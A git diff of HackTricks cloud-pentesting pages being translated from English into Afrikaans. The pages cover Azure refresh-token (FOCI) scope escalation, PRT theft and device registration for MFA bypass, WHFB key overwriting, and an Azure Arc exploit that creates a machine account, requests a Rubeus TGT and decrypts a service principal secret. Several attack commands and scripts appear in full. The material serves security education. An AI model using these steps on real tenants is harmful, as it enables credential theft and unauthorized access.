-### Access Tokens Scopes "scp" +### Access Tokens Skoppe "scp" -The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to. +Die skop van 'n toegangstoken word binne die scp sleutel binne die toegangstoken JWT gestoor. Hierdie skoppe definieer waartoe die toegangstoken toegang het. -If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT. - -### Get refresh & access token example +As 'n JWT toegelaat word om 'n spesifieke API te kontak, maar **nie die skop het** om die aangevraagde aksie uit te voer nie, sal dit **nie in staat wees om die aksie** met daardie JWT uit te voer nie. +### Kry herfris & toegang token voorbeeld ```python # Code example from https://github.com/secureworks/family-of-client-ids-research import msal @@ -107,17 +106,17 @@ from typing import Any, Dict, List # LOGIN VIA CODE FLOW AUTHENTICATION azure_cli_client = msal.PublicClientApplication( - "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client +"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client ) device_flow = azure_cli_client.initiate_device_flow( - scopes=["https://graph.microsoft.com/.default"] +scopes=["https://graph.microsoft.com/.default"] ) print(device_flow["message"]) # Perform device code flow authentication azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow( - device_flow +device_flow ) pprint(azure_cli_bearer_tokens_for_graph_api) 
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api) # DECODE JWT def decode_jwt(base64_blob: str) -> Dict[str, Any]: - """Decodes base64 encoded JWT blob""" - return jwt.decode( - base64_blob, options={"verify_signature": False, "verify_aud": False} - ) +"""Decodes base64 encoded JWT blob""" +return jwt.decode( +base64_blob, options={"verify_signature": False, "verify_aud": False} +) decoded_access_token = decode_jwt( - azure_cli_bearer_tokens_for_graph_api.get("access_token") +azure_cli_bearer_tokens_for_graph_api.get("access_token") ) pprint(decoded_access_token) # GET NEW ACCESS TOKEN AND REFRESH TOKEN new_azure_cli_bearer_tokens_for_graph_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), - # Same scopes as original authorization - scopes=["https://graph.microsoft.com/.default"], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), +# Same scopes as original authorization +scopes=["https://graph.microsoft.com/.default"], +) ) pprint(new_azure_cli_bearer_tokens_for_graph_api) ``` - ## FOCI Tokens Privilege Escalation -Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended. +Voorheen is genoem dat verfrissingstokens aan die **scopes** waaraan dit gegenereer is, aan die **toepassing** en **huurder** waaraan dit gegenereer is, gekoppel moet wees. 
As enige van hierdie grense oorgesteek word, is dit moontlik om voorregte te verhoog, aangesien dit moontlik sal wees om toegangstokens vir ander hulpbronne en huurders te genereer waartoe die gebruiker toegang het en met meer scopes as wat oorspronklik bedoel was. -Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them." +Boonop, **dit is moontlik met alle verfrissingstokens** in die [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra-rekeninge, Microsoft persoonlike rekeninge, en sosiale rekeninge soos Facebook en Google) omdat die [**dokumentasie**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) noem: "Verfrissingstokens is gebonde aan 'n kombinasie van gebruiker en kliënt, maar **is nie aan 'n hulpbron of huurder gekoppel nie**. 'n Kliënt kan 'n verfrissingstoken gebruik om toegangstokens te verkry **oor enige kombinasie van hulpbron en huurder** waar dit toestemming het om dit te doen. Verfrissingstokens is versleuteld en slegs die Microsoft identity platform kan dit lees." -Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server. +Boonop, let daarop dat die FOCI-toepassings openbare toepassings is, so **geen geheim is nodig** om by die bediener te autentiseer. 
-Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv). +Dan bekende FOCI-kliënte wat in die [**oorspronklike navorsing**](https://github.com/secureworks/family-of-client-ids-research/tree/main) gerapporteer is, kan [**hier gevind word**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv). ### Get different scope -Following with the previous example code, in this code it's requested a new token for a different scope: - +Volgende met die vorige voorbeeldkode, in hierdie kode word 'n nuwe token vir 'n ander scope aangevra: ```python # Code from https://github.com/secureworks/family-of-client-ids-research azure_cli_bearer_tokens_for_outlook_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - new_azure_cli_bearer_tokens_for_graph_api.get( - "refresh_token" - ), - # But different scopes than original authorization - scopes=[ - "https://outlook.office.com/.default" - ], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +new_azure_cli_bearer_tokens_for_graph_api.get( +"refresh_token" +), +# But different scopes than original authorization +scopes=[ +"https://outlook.office.com/.default" +], +) ) pprint(azure_cli_bearer_tokens_for_outlook_api) ``` - -### Get different client and scopes - +### Kry verskillende kliënt en skope ```python # Code from https://github.com/secureworks/family-of-client-ids-research microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c") microsoft_office_bearer_tokens_for_graph_api = ( - # This is a different client application than we used in the previous examples - microsoft_office_client.acquire_token_by_refresh_token( - # But we can use the refresh token issued to our 
original client application - azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), - # And request different scopes too - scopes=["https://graph.microsoft.com/.default"], - ) +# This is a different client application than we used in the previous examples +microsoft_office_client.acquire_token_by_refresh_token( +# But we can use the refresh token issued to our original client application +azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), +# And request different scopes too +scopes=["https://graph.microsoft.com/.default"], +) ) # How is this possible? pprint(microsoft_office_bearer_tokens_for_graph_api) ``` - -## References +## Verwysings - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md index 5fe503c0b..ef280df02 100644 --- a/src/pentesting-cloud/azure-security/az-device-registration.md +++ b/src/pentesting-cloud/azure-security/az-device-registration.md 
@@ -4,21 +4,19 @@ ## Basic Information -When a device joins AzureAD a new object is created in AzureAD. +Wanneer 'n toestel by AzureAD aansluit, word 'n nuwe objek in AzureAD geskep. -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. +Wanneer 'n toestel geregistreer word, **word die gebruiker gevra om in te log met sy rekening** (wat MFA vra indien nodig), dan versoek dit tokens vir die toestelregistrasiediens en vra dan 'n finale bevestigingsprompt. -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: +Dan word twee RSA-sleutelpaar in die toestel gegenereer: Die **toestelsleutel** (**publieke** sleutel) wat na **AzureAD** gestuur word en die **transport** sleutel (**private** sleutel) wat in TPM gestoor word indien moontlik. +Dan word die **objek** in **AzureAD** geskep (nie in Intune nie) en AzureAD gee 'n **sertifikaat** wat deur dit onderteken is, terug aan die toestel. Jy kan nagaan dat die **toestel AzureAD-verbonden** is en inligting oor die **sertifikaat** (soos of dit deur TPM beskerm word). ```bash dsregcmd /status ``` +Na die toestelregistrasie word 'n **Primary Refresh Token** deur die LSASS CloudAP-module aangevra en aan die toestel gegee. 
Met die PRT word ook die **sessiesleutel versleuteld sodat slegs die toestel dit kan ontsleutel** (met die publieke sleutel van die vervoersleutel) en dit is **nodig om die PRT te gebruik.** -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: +Vir meer inligting oor wat 'n PRT is, kyk: {{#ref}} az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md 
@@ -26,19 +24,18 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md ### TPM - Trusted Platform Module -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. +Die **TPM** **beskerm** teen sleutel **onttrekking** van 'n afgeskakel toestel (as dit deur 'n PIN beskerm word) en teen die onttrekking van die private materiaal uit die OS-laag.\ +Maar dit **beskerm nie** teen **sniffing** van die fisiese verbinding tussen die TPM en CPU of **gebruik van die kriptografiese materiaal** in die TPM terwyl die stelsel loop vanaf 'n proses met **SYSTEM** regte. -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): +As jy die volgende bladsy kyk, sal jy sien dat **diefstal van die PRT** gebruik kan word om toegang te verkry soos 'n **gebruiker**, wat wonderlik is omdat die **PRT op toestelle geleë is**, so dit kan van hulle gesteel word (of as dit nie gesteel word, misbruik word om nuwe ondertekeningsleutels te genereer): {{#ref}} az-lateral-movement-cloud-on-prem/pass-the-prt.md {{#endref}} -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: +## Registrasie van 'n toestel met SSO tokens +Dit sou moontlik wees vir 'n aanvaller om 'n token vir die Microsoft toestelregistrasiediens van die gecompromitteerde toestel aan te vra en dit te registreer: ```bash # Initialize SSO flow roadrecon auth prt-init 
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie # Custom pyhton script to register a device (check roadtx) registerdevice.py ``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. +Which will give you a **sertifikaat wat jy kan gebruik om in die toekoms vir PRTs te vra**. Daarom om volharding te handhaaf en **MFA te omseil** omdat die oorspronklike PRT-token wat gebruik is om die nuwe toestel te registreer **reeds MFA-toestemmings toegeken het**. > [!TIP] -> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. +> Let daarop dat jy toestemming nodig het om **nuwe toestelle te registreer** om hierdie aanval uit te voer. Ook, die registrasie van 'n toestel beteken nie dat die toestel **toegelaat sal word om in Intune te registreer** nie. > [!CAUTION] -> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). +> Hierdie aanval is in September 2021 reggestel aangesien jy nie meer nuwe toestelle kan registreer met 'n SSO-token nie. Dit is egter steeds moontlik om toestelle op 'n wettige manier te registreer (met gebruikersnaam, wagwoord en MFA indien nodig). Kyk: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). 
-## Overwriting a device ticket +## Oorskrywing van 'n toestelkaartjie -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). +Dit was moontlik om 'n **toestelkaartjie aan te vra**, die huidige een van die toestel te **oorskryf**, en tydens die vloei die **PRT te steel** (so geen behoefte om dit van die TPM te steel nie. Vir meer inligting [**kyk na hierdie praatjie**](https://youtu.be/BduCn8cLV1A).
> [!CAUTION] -> However, this was fixed. +> Dit is egter reggestel. -## Overwrite WHFB key +## Oorskrywing van WHFB-sleutel -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) +[**Kyk die oorspronklike skyfies hier**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) -Attack summary: +Aanval opsomming: -- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -- This also provides **persistence** +- Dit is moontlik om die **geregistreerde WHFB** sleutel van 'n **toestel** via SSO te **oorskryf** +- Dit **verslaan TPM-beskerming** aangesien die sleutel **gesnif word tydens die generasie** van die nuwe sleutel +- Dit bied ook **volharding**
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: +Gebruikers kan hul eie searchableDeviceKey eienskap via die Azure AD Graph wysig, egter, die aanvaller moet 'n toestel in die tenant hĂȘ (geregistreer op die vlug of 'n gesteelde sertifikaat + sleutel van 'n wettige toestel hĂȘ) en 'n geldige toegangstoken vir die AAD Graph. +Dan is dit moontlik om 'n nuwe sleutel te genereer met: ```bash roadtx genhellokey -d -k tempkey.key ``` - -and then PATCH the information of the searchableDeviceKey: +en dan PATCH die inligting van die searchableDeviceKey:
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: +Dit is moontlik om 'n toegangstoken van 'n gebruiker te verkry via **device code phishing** en die vorige stappe te misbruik om **sy toegang te steel**. Vir meer inligting, kyk: {{#ref}} az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
-## References +## Verwysings - [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) - [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) - [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md index 6a0dce1da..b5b2ed16d 100644 --- a/src/pentesting-cloud/azure-security/az-enumeration-tools.md +++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md @@ -2,10 +2,10 @@ {{#include ../../banners/hacktricks-training.md}} -## Install PowerShell in Linux +## Installeer PowerShell in Linux > [!TIP] -> In linux you will need to install PowerShell Core: +> In linux moet jy PowerShell Core installeer: > > ```bash > sudo apt-get update @@ -14,11 +14,11 @@ > # Ubuntu 20.04 > wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb > -> # Update repos +> # Werk repos op > sudo apt-get update > sudo add-apt-repository universe > -> # Install & start powershell +> # Installeer & begin powershell > sudo apt-get install -y powershell > pwsh 
> @@ -26,58 +26,47 @@ > curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash > ``` -## Install PowerShell in MacOS +## Installeer PowerShell in MacOS -Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4): - -1. Install `brew` if not installed yet: +Instruksies van die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4): +1. Installeer `brew` as dit nog nie geĂŻnstalleer is nie: ```bash /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` - -2. Install the latest stable release of PowerShell: - +2. Installeer die nuutste stabiele weergawe van PowerShell: ```sh brew install powershell/tap/powershell ``` - -3. Run PowerShell: - +3. Voer PowerShell uit: ```sh pwsh ``` - -4. Update: - +4. Opdatering: ```sh brew update brew upgrade powershell ``` - -## Main Enumeration Tools +## Hoof Enumerasie Gereedskap ### az cli -[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts. +[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is 'n kruis-platform hulpmiddel geskryf in Python vir die bestuur en administrasie van (meeste) Azure en Entra ID hulpbronne. Dit maak verbinding met Azure en voer administratiewe opdragte uit via die opdraglyn of skripte. -Follow this link for the [**installation instructionsÂĄ**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install). +Volg hierdie skakel vir die [**installasie instruksiesÂĄ**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install). 
-Commands in Azure CLI are structured using a pattern of: `az ` +Opdragte in Azure CLI is gestruktureer volgens 'n patroon van: `az ` #### Debug | MitM az cli -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: - +Deur die parameter **`--debug`** is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur te sien: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} ### Az PowerShell -Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line. +Azure PowerShell is 'n module met cmdlets om Azure hulpbronne direk vanaf die PowerShell-opdraglyn te bestuur. -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell). +Volg hierdie skakel vir die [**installasie-instruksies**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell). -Commands in Azure PowerShell AZ Module are structured like: `-Az ` +Opdragte in Azure PowerShell AZ Module is gestruktureer soos: `-Az ` #### Debug | MitM Az PowerShell -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: - +Deur die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien: ```bash Get-AzResourceGroup -Debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy). +Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy die omgewing veranderlikes `HTTPS_PROXY` en `HTTP_PROXY` instel volgens die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy). 
### Microsoft Graph PowerShell -Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features. +Microsoft Graph PowerShell is 'n kruis-platform SDK wat toegang tot al die Microsoft Graph API's moontlik maak, insluitend dienste soos SharePoint, Exchange, en Outlook, met 'n enkele eindpunt. Dit ondersteun PowerShell 7+, moderne verifikasie via MSAL, eksterne identiteite, en gevorderde navrae. Met 'n fokus op die minste privaatheidstoegang, verseker dit veilige bedrywighede en ontvang gereelde opdaterings om in lyn te wees met die nuutste Microsoft Graph API kenmerke. -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation). +Volg hierdie skakel vir die [**installasie instruksies**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation). -Commands in Microsoft Graph PowerShell are structured like: `-Mg ` +Opdragte in Microsoft Graph PowerShell is gestruktureer soos: `-Mg ` -#### Debug Microsoft Graph PowerShell - -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: +#### Foutopsporing van Microsoft Graph PowerShell +Met die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien: ```bash Get-MgUser -Debug ``` - ### ~~**AzureAD Powershell**~~ -The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID. 
+Die Azure Active Directory (AD) module, nou **verouderd**, is deel van Azure PowerShell vir die bestuur van Azure AD hulpbronne. Dit bied cmdlets vir take soos die bestuur van gebruikers, groepe, en aansoekregistrasies in Entra ID. > [!TIP] -> This is replaced by Microsoft Graph PowerShell - -Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD). - - - +> Dit is vervang deur Microsoft Graph PowerShell +Volg hierdie skakel vir die [**installasie-instruksies**](https://www.powershellgallery.com/packages/AzureAD). diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md index e53ceb412..79e592b37 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md 
@@ -4,17 +4,16 @@ ### Identifying the Issues -Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1. +Azure Arc stel die integrasie van nuwe interne bedieners (aangeslote domeinbedieners) in Azure Arc via die Groep Beleidsobjek metode moontlik. Om dit te fasiliteer, bied Microsoft 'n ontplooiing toolkit wat nodig is om die aanmeldproses te begin. Binne die ArcEnableServerGroupPolicy.zip lĂȘer, kan die volgende skripte gevind word: DeployGPO.ps1, EnableAzureArc.ps1, en AzureArcDeployment.psm1. -When executed, the DeployGPO.ps1 script performs the following actions: +Wanneer uitgevoer, voer die DeployGPO.ps1 skrip die volgende aksies uit: -1. Creates the Azure Arc Servers Onboarding GPO within the local domain. -2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package. +1. Skep die Azure Arc Servers Onboarding GPO binne die plaaslike domein. +2. Kopieer die EnableAzureArc.ps1 aanmeldskrip na die aangewese netwerkdeel wat geskep is vir die aanmeldproses, wat ook die Windows installer pakket bevat. -When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script. - -An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. 
The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments. +Wanneer hierdie skrip uitgevoer word, moet stelselsadmins twee hoofparameters verskaf: **ServicePrincipalId** en **ServicePrincipalClientSecret**. Daarbenewens vereis dit ander parameters soos die domein, die FQDN van die bediener wat die deel huisves, en die deelnaam. Verdere besonderhede soos die tenant ID, hulpbron groep, en ander nodige inligting moet ook aan die skrip verskaf word. +'n GeĂ«nkripteerde geheim word in die AzureArcDeploy gids op die gespesifiseerde deel gegenereer met behulp van DPAPI-NG enkripsie. Die geĂ«nkripteerde geheim word in 'n lĂȘer genaamd encryptedServicePrincipalSecret gestoor. Bewyse hiervan kan in die DeployGPO.ps1 skrip gevind word, waar die enkripsie uitgevoer word deur ProtectBase64 met $descriptor en $ServicePrincipalSecret as insette aan te roep. Die descriptor bestaan uit die Domein Rekenaar en Domein Beheerder groep SIDs, wat verseker dat die ServicePrincipalSecret slegs deur die Domein Beheerders en Domein Rekenaar sekuriteitsgroepe ontkripteer kan word, soos opgemerk in die skrip kommentaar. ```powershell # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups $DomainComputersSID = "SID=" + $DomainComputersSID 
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR " Import-Module $PSScriptRoot\AzureArcDeployment.psm1 $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret) ``` - ### Exploit -We have the follow conditions: +Ons het die volgende toestande: -1. We have successfully penetrated the internal network. -2. We have the capability to create or assume control of a computer account within Active Directory. -3. We have discovered a network share containing the AzureArcDeploy directory. - -There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations. +1. Ons het suksesvol die interne netwerk binnegedring. +2. Ons het die vermoĂ« om 'n rekenaarrekening binne Active Directory te skep of te beheer. +3. Ons het 'n netwerkdeel ontdek wat die AzureArcDeploy-gids bevat. +Daar is verskeie metodes om 'n masjienrekening binne 'n AD-omgewing te verkry. Een van die mees algemene is om die masjienrekeningkwota te benut. 'n Ander metode behels die kompromittering van 'n masjienrekening deur kwesbare ACL's of verskeie ander miskonfigurasies. ```powershell Import-MKodule powermad New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose ``` - -Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe. - +Sodra 'n masjienrekening verkry is, is dit moontlik om te autentiseer met hierdie rekening. Ons kan of die runas.exe-opdrag met die netonly-vlag gebruik of pass-the-ticket met Rubeus.exe gebruik. ```powershell runas /user:fake01$ /netonly powershell ``` 
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell ```powershell .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr ``` - -By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret. - +Deur die TGT vir ons rekenaarrekening in geheue te stoor, kan ons die volgende skrip gebruik om die dienshoofsekrte te ontsleutel. ```powershell Import-Module .\AzureArcDeployment.psm1 @@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret) $ebs ``` +Alternatiewelik kan ons [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG) gebruik. -Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG). - -At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal. +Op hierdie punt kan ons die oorblywende inligting versamel wat nodig is om met Azure te verbind vanaf die ArcInfo.json-lĂȘer, wat op dieselfde netwerkdeel as die encryptedServicePrincipalSecret-lĂȘer gestoor is. Hierdie lĂȘer bevat besonderhede soos: TenantId, servicePrincipalClientId, ResourceGroup, en meer. Met hierdie inligting kan ons Azure CLI gebruik om as die gecompromitteerde dienshoof te autentiseer. ## References - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md index 2ddcbb0a5..04abc0d61 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md 
